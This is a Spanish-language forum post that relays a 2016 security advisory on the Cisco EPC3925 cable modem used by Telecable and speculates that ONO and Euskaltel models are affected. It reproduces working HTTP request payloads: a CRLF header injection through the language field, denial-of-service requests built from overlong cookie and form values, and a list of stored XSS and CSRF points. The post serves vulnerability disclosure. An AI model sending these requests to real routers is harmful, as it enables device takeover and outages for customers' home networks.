Brechas Cisco EPC3925: Telecable y probablemente OnO y Euskatel (Pagina 1) / Linksys-Cisco / Foro Wifi-libre.com

El libre pensamiento para un internet libre

No estas registrado.     

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#1 19-09-2016 16:47:38

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,066

Brechas Cisco EPC3925: Telecable y probablemente OnO y Euskatel

El aviso de seguridad "Cisco EPC 3925 XSS / CSRF / HTTP Response Injection / DoS" desvela varias brechas muy serias en este modelo empleado por telecable y que podrían afectar también al  Cisco EPC3825 de ONO y Euskaltel

EPC3925_3.jpg

Patryk BODGAN acaba de publicar una lista de nuevas vulnerabilidades en Packet Storm:

Cookies LANG

Para el menú de hoy tenemos a unos cookies traficados que permiten grabar datos en la memoria del router:

1. HTTP Response Injection

It is able to inject arbitrary data into device memory via 'Lang' cookie,
additional data will be stored until modem restart and will be returned with every http response.

#1 - Request:
POST /goform/Docsis_system HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Docsis_system.asp
Cookie: Lang=en; SessionID=171110
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 109

username_login=aaa&password_login=bbb&LanguageSelect=en%0d%0aSet-Cookie: pwned&Language_Submit=0&login=Log+In

#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Docsis_system.asp
Content-type: text/html
Connection: close
(...)

Podremos también hacer una DoS utilizando este tipo de cookies (Lang)
No es muy complicado, solo tenemos que mandar una variable basura muy larga, el sistema no las aguanta y es un crash total...

EPC3925_1.jpg

Indigestión de galletas. big_smile
Podemos hacer lo así también, una variable larga y pedimos el cierre de la conexión

Cookie: Lang=enXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX; SessionID=163190
Connection: close

Mismo efecto: un colapso del sistema.

DoS con petición http para ver la lista de clientes wifi

Es un otro ejemplo de inyección http a lo bruto con efectos violentos y devastadores...
La técnica es la mima, añadimos una variable larga en nuestra petición para derrumbar el sistema.
El autor lo hace con

sortWireless=status&h_sortWireless=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Efecto inmediato

#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/WClientMACList.asp
Content-type: text/html
Connection: close

( ... crash ... )
Se pueden editar los valores de los canales sin credenciales y reiniciar así el router
CSRF (falsificación de petición en sitios cruzados)

Seguimos con la inyección de comandos y vamos a lo chungo chungo:
Podemos cambiar así los credenciales y abrir una puerta trasera tongue

EPC3925_2.jpg

exploits javascript (XSS)

Del mismo palo que la brecha anterior pero pasando por javascript...
Lo más difícil es saber que forma elegir para poner nuestros exploits tongue

6. Stored XSS in SMTP Settings (Administration -> Reportning)
7. Stored XSS in User Name #1 (e.g Administration -> Managment / Setup -> Quick Setup)
8. Stored XSS in User Name #2 (Access Restrictions -> User Setup)
9. Stored XSS in ToD Filter (Access Restrictions -> Time of Day Rules)
10. Stored XSS in Rule Name (Access Restrictions -> Basic Rules)
11. Stored XSS in Domain Name (Access Restrictions -> Basic Rules)
12. Stored XSS in Network Name (e.g Wireless -> Basic Settings)
13. Stored XSS in DDNS Settings (Setup -> DDNS)
14. Stored XSS in Advanced VPN Setup (Security -> VPN -> Advanced Settings)
Telecable, cierto.... ¿Pero se sabe algo del del Cisco EPC3825 de ONO y Euskaltel.?

  La operadora de Asturiana esta directamente afectada ya que usa el EPC3925
La gran desconocida es sobre los EPC3825 de OnO y Euskatel
    Son modelos tan parecidos que todo da a pensar que estas brechas les afectan.
    Usan el mismo firmware docsis 3.0 y según banda ancha:

El Cisco EPC3925 es la versión con MTA del Cisco EPC3825 de ONO y Euskaltel.

Cisco EPC3925 @ bandaancha.st

Si no me equivoco se refieren a un "Mail Transfert agent" que no esta involucrado directamente en ninguna de las brechas.
  No vivo en el país vasco y no tengo acceso a un PA OnO con lo cuál no puedo afirmar rotundamente nada
  Pero  apostaría a que unas de estas brechas sean explotables en el modelo de OnO y Euskatel.... Así que al ojo porque en caso de intrusión hay formas de hacer daño muy rápido y muy simplemente.

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

Temas similares

Pie de página

Información del usuario

Ultimo usuario registrado: BRYANRC95
Usuarios registrados conectados: 2
Invitados conectados: 10

Conectados: 5.1 M1ck3y

Estadisticas de los foros

Número total de usuarios registrados: 622
Número total de temas: 842
Número total de mensajes: 6,832

Máx. usuarios conectados: 61 el 28-03-2017 00:04:22